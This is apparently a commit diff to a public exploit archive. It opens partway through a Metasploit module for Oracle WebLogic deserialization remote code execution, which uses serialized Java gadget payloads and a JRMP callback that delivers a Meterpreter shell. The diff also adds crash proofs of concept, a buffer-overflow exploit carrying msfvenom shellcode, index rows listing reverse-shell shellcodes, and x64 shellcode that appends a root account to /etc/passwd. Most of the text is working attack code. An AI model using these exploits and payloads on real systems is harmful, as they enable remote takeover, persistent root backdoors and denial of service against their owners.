@resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'
@resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'
@resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'
@resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'
@resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'
@resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'
@resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'
@resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'
@resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'
@resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'
@resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'
@resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'
@resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'
@resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'
@resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'
@resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'
@resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'
@resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'
@resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'
@resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'
@resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'
@resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'
@resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'
@resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'
@resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'
@resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'
@resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'
@resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'
@resp << '673badd256e7e91d7b470200007078700000000174'
@resp << mycmd
@resp << '74'
@resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'
@resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'
@resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'
@resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'
@resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'
@resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'
@resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'
@resp << '7e005a'
end
def on_client_connect(client)
# Make sure to only sent one meterpreter payload to a host.
# During testing the remote host called back up to 11 times
# (or as long as the server was listening).
vprint_status("Comparing host: #{client.peerhost}")
if @met_sent.include?(client.peerhost) then return end
@met_sent << client.peerhost
vprint_status("met_sent: #{@met_sent}")
# Response format determined by watching network traffic
# generated by EDB PoC
accept_conn = '4e00'
raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join
accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')
accept_conn << raccept_conn
accept_conn << '0000'
accept_conn << client.peerport.to_s(16).rjust(4,'0')
client.put([accept_conn].pack('H*'))
client.put([@resp].pack('H*'))
end
def t3_handshake
shake = '74332031322e322e310a41533a323535'
shake << '0a484c3a31390a4d533a313030303030'
shake << '30300a0a'
sock.put([shake].pack('H*'))
sleep(1)
sock.get_once
end
def build_t3_request_object
# data block is from EDB PoC
data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
data << '700000000a000000030000000000000006007070707070700000000a00000003'
data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'
data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'
data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'
data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'
data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'
data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'
data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'
data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'
data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'
data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'
data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'
data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'
data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'
data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'
data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'
data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'
data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'
data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'
data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'
data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'
data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'
data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'
data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'
data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'
data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'
data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'
data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'
data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'
data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'
data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'
data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'
data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'
data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'
data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'
data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'
data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'
data << '2d4147444d565155423154362e656883348cd6000000070000'
data << rport.to_s(16).rjust(4, '0')
data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'
data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'
data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'
data << '863d1d0000000078'
sock.put([data].pack('H*'))
sleep(2)
sock.get_once
end
def send_payload_objdata
# JRMPClient2 payload generated from EDB PoC:
# python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2
# Patch in srvhost and srvport
payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'
payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'
payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'
payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'
payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'
payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'
payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'
payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'
payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'
payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
payload << '78707702000078fe010000'
# Data
payload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e'
payload << '416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50'
payload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67'
payload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200'
payload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76'
payload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176'
payload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133'
payload << '1e030000787077'
unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join
unicast_dat = '000a556e696361737452656600'
unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')
unicast_dat << unicast_srvhost
unicast_dat << '0000'
unicast_dat << srvport.to_s(16).rjust(4,'0')
unicast_dat << '000000004e18654b000000000000000000000000000000'
unicast_dat << '78'
payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')
payload << unicast_dat
payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'
payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'
payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'
payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
payload << '6f3b290000001b7878fe00ff'
data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
data << payload
sock.put([data].pack('H*'))
sleep(1)
sock.put([data].pack('H*'))
sleep(1)
sock.get_once
end
def exploit
@met_sent = []
gen_resp
connect
vprint_status('Sending handshake...')
t3_handshake
build_t3_request_object
start_service
vprint_status('Sending payload...')
send_payload_objdata
# Need to wait this long to make sure we get a shell back
sleep(10)
end
end

25
exploits/windows_x86/dos/45182.py Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: IP Finder 1.5 - Denial of Service (PoC)
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Discovey Date: 2018-08-12
# Software Link: https://securimport.com/university/index.php/videovigilancia-ip/software/429-ip-finder
# Tested Version: 1.5
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the Search&Config Tool program paste the content of
# "exploit.txt" in password field. You will see a crash.
#!/usr/bin/python
buffer = "A" * 1500
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

23
exploits/windows_x86/dos/45191.py Executable file
View file

@ -0,0 +1,23 @@
# Exploit Title: Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)
# Discovery by: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Discovey Date: 2018-08-13
# Vendor Homepage: https://switchportmapper.com/
# Software Link: https://switchportmapper.com/download/spm2812.zip
# Tested Version: 2.81.2
# Tested on OS: Windows 7 Ultimate x86_64
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name
# "exploit.txt". Just copy the text inside "exploit.txt" and start the
# Managed Switch Port Mapping Tool 2.81.2 program and click on "Enter Key".
# In the 'Name field' paste the content of "exploit.txt" and click
# on "OK". You will see a crash.
#!/usr/bin/env python
file = open("exploit.txt","wb")
junk = "A" * 3000
exploit = junk
buf = exploit
file.write(buf)
file.close()

54
exploits/windows_x86/local/45181.py Executable file
View file

@ -0,0 +1,54 @@
# Exploit Title: iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Discovey Date: 2018-08-12
# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
# Tested Version: 1.5
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name
# "exploit.txt" just copy the text inside "exploit.txt" and start the
# iSmartViewPro 1.5 program and click on "System Setup" in the
# "Save Path for Snapshot and Record file" field. Paste the content of
# "exploit.txt" and click on Save. You will see a sweet calculator poped up.
# Greetz: @FuzzySec @LiveOverflow @hexachordanu @HansSecurity
#!/usr/bin/python
buffer = "A" * 272
#0x6a192c79 : call ebp | asciiprint,ascii {PAGE_EXECUTE_READ} [avcodec-54.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\iSmartViewPro\avcodec-54.dll)
eip = "\x79\x2C\x19\x6A"
nops = "\x90" *12
#badchar \x00\x0a\x0d
#msfvenom -p windows/exec cmd=calc.exe -b '\x00\x0a\x0d' -f python
buf = ""
buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
pad = "B" * (600 - len(eip) - len(buffer) - len(nops) - len(buf) )
payload = buffer + eip + nops + buf + pad
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

12
files_exploits.csv
View file

@ -6041,6 +6041,10 @@ id,file,description,date,author,type,platform,port
45168,exploits/hardware/dos/45168.txt,"TP-Link Wireless N Router WR840N - Denial of Service (PoC)",2018-08-08,"Aniket Dinda",dos,hardware,80
45162,exploits/windows_x86-64/dos/45162.py,"QNap QVR Client 5.0.3.23100 - Denial of Service (PoC)",2018-08-07,"Rodrigo Eduardo Rodriguez",dos,windows_x86-64,
45174,exploits/multiple/dos/45174.py,"reSIProcate 1.10.2 - Heap Overflow",2018-08-09,"Joachim De Zutter",dos,multiple,5061
45182,exploits/windows_x86/dos/45182.py,"IP Finder 1.5 - Denial of Service (PoC)",2018-08-13,"Shubham Singh",dos,windows_x86,
45186,exploits/windows/dos/45186.py,"Acunetix WVS 10.0 Build 20150623 - Denial of Service (PoC)",2018-08-13,"Javier Enrique Rodriguez Gutierrez",dos,windows,
45187,exploits/hardware/dos/45187.py,"PLC Wireless Router GPN2.4P21-C-CN - Denial of Service",2018-08-13,"Chris Rose",dos,hardware,
45191,exploits/windows_x86/dos/45191.py,"Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)",2018-08-13,"Shubham Singh",dos,windows_x86,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9864,6 +9868,9 @@ id,file,description,date,author,type,platform,port
45166,exploits/windows_x86-64/local/45166.py,"iSmartViewPro 1.5 - 'Account' Buffer Overflow",2018-08-08,"Alan Joaquín Baeza Meza",local,windows_x86-64,
45175,exploits/linux/local/45175.c,"Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read",2018-08-09,"Andrey Konovalov",local,linux,
45176,exploits/windows_x86-64/local/45176.py,"iSmartViewPro 1.5 - 'Password' Buffer Overflow",2018-08-10,"Javier Enrique Rodriguez Gutierrez",local,windows_x86-64,
45181,exploits/windows_x86/local/45181.py,"Monitoring software iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow",2018-08-13,"Shubham Singh",local,windows_x86,
45184,exploits/linux/local/45184.sh,"PostgreSQL 9.4-0.5.3 - Privilege Escalation",2018-08-13,"Johannes Segitz",local,linux,
45192,exploits/android/local/45192.txt,"Android - Directory Traversal over USB via Injection in blkid Output",2018-08-13,"Google Security Research",local,android,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16676,7 +16683,9 @@ id,file,description,date,author,type,platform,port
45099,exploits/php/remote/45099.rb,"WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)",2018-07-27,Metasploit,remote,php,80
45100,exploits/linux/remote/45100.rb,"Axis Network Camera - .srv to parhand RCE (Metasploit)",2018-07-27,Metasploit,remote,linux,80
45124,exploits/linux/remote/45124.rb,"SonicWall Global Management System - XMLRPC set_time_zone Command Injection (Metasploit)",2018-08-01,Metasploit,remote,linux,80
45180,exploits/windows/remote/45180.txt,"Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution",2018-08-13,hyp3rlinx,remote,windows,
45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows,
45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39778,8 +39787,9 @@ id,file,description,date,author,type,platform,port
45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443
45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,80
45158,exploits/java/webapps/45158.txt,"Wavemaker Studio 6.6 - Server-Side Request Forgery",2018-08-06,"Gionathan Reale",webapps,java,
45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,
45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,
45172,exploits/hardware/webapps/45172.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)",2018-08-09,Wadeek,webapps,hardware,80
45173,exploits/hardware/webapps/45173.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)",2018-08-09,Wadeek,webapps,hardware,80
45177,exploits/php/webapps/45177.txt,"Zimbra 8.6.0_GA_1153 - Cross-Site Scripting",2018-08-10,"Dino Barlattani",webapps,php,
45179,exploits/php/webapps/45179.txt,"MyBB Like Plugin 3.0.0 - Cross-Site Scripting",2018-08-10,0xB9,webapps,php,
45190,exploits/multiple/webapps/45190.txt,"IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting",2018-08-13,"Vikas Khanna",webapps,multiple,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -900,3 +900,4 @@ id,file,description,date,author,type,platform
45119,shellcodes/arm/45119.c,"Linux/ARM - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (116 Bytes)",2018-08-01,"Ken Kitahara",shellcode,arm
45139,shellcodes/linux_x86/45139.c,"Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)",2018-08-03,"Kartik Durg",shellcode,linux_x86
45144,shellcodes/arm/45144.c,"Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (128 Bytes)",2018-08-03,"Ken Kitahara",shellcode,arm
45185,shellcodes/linux_x86-64/45185.asm,"Linux/x64 - Add Root User (toor/toor) Shellcode (99 bytes)",2018-08-13,epi,shellcode,linux_x86-64

1 id file description date author type platform
900 45119 shellcodes/arm/45119.c Linux/ARM - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (116 Bytes) 2018-08-01 Ken Kitahara shellcode arm
901 45139 shellcodes/linux_x86/45139.c Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes) 2018-08-03 Kartik Durg shellcode linux_x86
902 45144 shellcodes/arm/45144.c Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (128 Bytes) 2018-08-03 Ken Kitahara shellcode arm
903 45185 shellcodes/linux_x86-64/45185.asm Linux/x64 - Add Root User (toor/toor) Shellcode (99 bytes) 2018-08-13 epi shellcode linux_x86-64

93
shellcodes/linux_x86-64/45185.asm Normal file
View file

@ -0,0 +1,93 @@
; Title: add root user (toor:toor)
; Date: 20180811
; Author: epi <epibar052@gmail.com>
; https://epi052.gitlab.io/notes-to-self/
; Tested on: linux/x86_64 (SMP CentOS-7 3.10.0-862.2.3.el7.x86_64 GNU/Linux)
;
; Shellcode Length: 99 bytes
; Action: Adds a user into /etc/passwd with the following information
; username: toor
; password: toor
; uid: 0
; gid: 0
; home: /root
; shell: /bin/sh
;
; toor:sXuCKi7k3Xh/s:0:0::/root:/bin/sh
global _start
section .text
_start:
; #define __NR_open 2
; int open(const char *pathname, int flags);
; rax -> 2
; rdi -> /etc/passwd
; rsi -> 0x401
;
; >>> hex(os.O_WRONLY ^ os.O_APPEND)
; 0x401
xor ebx, ebx
mul ebx ; rax|rdx -> 0x0
push rax
mov ebx, 0x647773ff ; swd
shr ebx, 0x08
push rbx
mov rbx, 0x7361702f6374652f ; /etc/pas
push rbx
mov rdi, rsp ; rdi -> /etc/passwd
xchg esi, edx ; swap registers to zero out rsi
mov si, 0x401 ; rsi -> O_WRONLY|O_APPEND
add al, 0x2 ; rax -> 2 (open)
syscall ; open
xchg rdi, rax ; save returned fd
jmp short get_entry_address ; start jmp-call-pop
write_entry:
; #define __NR_write 1
; ssize_t write(int fd, const void *buf, size_t count);
; rax -> 1
; rdi -> results of open syscall
; rsi -> user's entry
; rdx -> len of user's entry
pop rsi ; end jmp-call-pop, rsi -> user's entry
push 0x1
pop rax ; rax -> 1
push 38 ; length + 1 for newline
pop rdx ; rdx -> length of user's entry
syscall ; write
; #define __NR_exit 60
; void _exit(int status);
; rax -> 60
; rdi -> don't care
push 60
pop rax
syscall ; OS will handle closing fd at exit
get_entry_address:
call write_entry
user_entry: db "toor:sXuCKi7k3Xh/s:0:0::/root:/bin/sh",0xa
; if the user_entry above is modified, change the _count_ argument in the write call to match the new length
; openssl passwd -crypt
; Password: toor
; Verifying - Password: toor
; sXuCKi7k3Xh/s
; Skeleton for testing
;
; gcc -fno-stack-protector -z execstack shellcode-skeleton.c -o shellcode-skeleton
;
; #include <stdio.h>
; #include <string.h>
;
; unsigned char shellcode[] = \
; "\x31\xdb\xf7\xe3\x50\xbb\xff\x73\x77\x64\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63\x2f\x70\x61\x73\x53\x48\x89\xe7\x87\xf2\x66\xbe\x01\x04\x04\x02\x0f\x05\x48\x97\xeb\x0e\x5e\x6a\x01\x58\x6a\x26\x5a\x0f\x05\x6a\x3c\x58\x0f\x05\xe8\xed\xff\xff\xff\x74\x6f\x6f\x72\x3a\x73\x58\x75\x43\x4b\x69\x37\x6b\x33\x58\x68\x2f\x73\x3a\x30\x3a\x30\x3a\x3a\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a";
;
; int main() {
; printf("Shellcode length: %zu\n", strlen(shellcode));
; int (*ret)() = (int(*)())shellcode;
; ret();
; }